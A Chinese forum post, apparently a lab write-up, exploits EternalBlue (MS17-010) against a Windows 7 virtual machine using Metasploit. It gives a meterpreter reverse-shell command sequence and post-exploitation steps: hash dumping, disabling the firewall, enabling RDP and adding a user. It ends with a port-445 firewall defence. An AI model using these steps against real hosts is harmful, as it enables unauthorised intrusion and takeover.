用户
搜索
  • TA的每日心情
    开心
    昨天 07:36
  • 签到天数: 101 天

    连续签到: 101 天

    [LV.6]常住居民II

    i春秋-见习白帽

    Rank: 3Rank: 3

    44

    主题

    91

    帖子

    2578

    魔法币
    收听
    0
    粉丝
    4
    注册时间
    2020-10-2
    发表于 2021-5-23 18:11:58 23732
    本帖最后由 Johnson666 于 2021-5-23 18:32 编辑

    利用 ms17-010(永恒之蓝)漏洞入侵渗透 Win7
    一、环境配置(两台主机均采用 NAT 桥接模式)

    1、Kali 主机的 IP 配置:

    1.png


    2、Windows7 主机的 IP 配置:

    2.png


    3.查看 Win7 主机打开的端口

    3.png


    二、利用 MSF 框架对 Win7 进行永恒之蓝渗透【实战篇】
    1、启用 msfconsole 攻击平台

    4.png


    2、查找目标主机的漏洞编号

    5.png


    3、使用永恒之蓝漏洞模块

    6.png


    4、设置 Payload

    7.png


    8.png

    5、查看 Payload 的设置情况

    9.png


    6、实施攻击

    10.png


    实施攻击过程的代码:

    [AppleScript] 纯文本查看 复制代码
    msf5 > search ms17_010
    msf5 > use exploit/windows/smb/ms17_010_eternalblue
    msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload
    windows/x64/meterpreter/reverse_tcp
    msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.100.131
    rhost => 192.168.100.131
    msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.100.128
    lhost => 192.168.100.128
    msf5 exploit(windows/smb/ms17_010_eternalblue) > set lport 1234
    msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit 


    7、攻入目标主机

    11.png


    8、查看目标主机的操作系统信息

    12.png


    9、对目标主机的屏幕进行截图

    13.png

    14.png


    10、查看目标主机所有的用户名和密码(密码显示为 hash 值)

    15.png


    11、关闭防火墙

    16.png


    12、关闭 Telnet 服务

    [AppleScript] 纯文本查看 复制代码
    net stop TlntSvr

    17.png


    13、用两种方法开启远程桌面服务,并查看远程桌面功能启用情况
    1)方法 1run getgui -e

    18.png


    2)方法 2run post/windows/manage/enable_rdp

    19.png


    20.png

    14、创建系统用户
    run getgui –u test –p 123456

    21.png


    三、利用 MSF 框架对 Win7 进行永恒之蓝渗透【防御篇】
    1、在打开 445 端口的前提下,利用系统自带的防火墙进行规则过滤
    1)在 win7 上打开防火墙设置窗口,并启用防火墙

    22.png


    23.png

    2)没有设置防火墙过滤规则前用 Nmap 对目标主机进行端口扫描

    24.png


    3)针对 445 端口设置过滤规则

    25.png

    26.png

    27.png

    28.png

    29.png


    30.png

    31.png

    4)设置防火墙过滤规则后的端口扫描

    32.png

    5)目标主机设置针对 445 端口的过滤规则后,kali 再对目标主机实施攻击
    33.png

    发表于 2021-5-27 10:00:46
    本帖最后由 Arry 于 2021-5-27 02:10 编辑

    永恒之蓝2017年5期间段、已经过去5年期间段、再说任何电脑安装360软件保护、网络意识比较强、有的计算机已补丁微软系统、难以攻破对方计算机、从角度一眼能够识别、在虚拟机拿权限问题不大因为靶机电脑Windows系统没有补丁、如果在Windows系统实体计算机已漏洞补丁系统最难攻破、靶机电脑和真实电脑还是有差别。
    使用道具 举报 回复
    Arry 发表于 2021-5-27 10:00
    永恒之蓝2017年5期间段、已经过去5年期间段、再说任何电脑安装360软件保护、网络意识比较强、有的计算机已 ...

    师傅说的是!
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册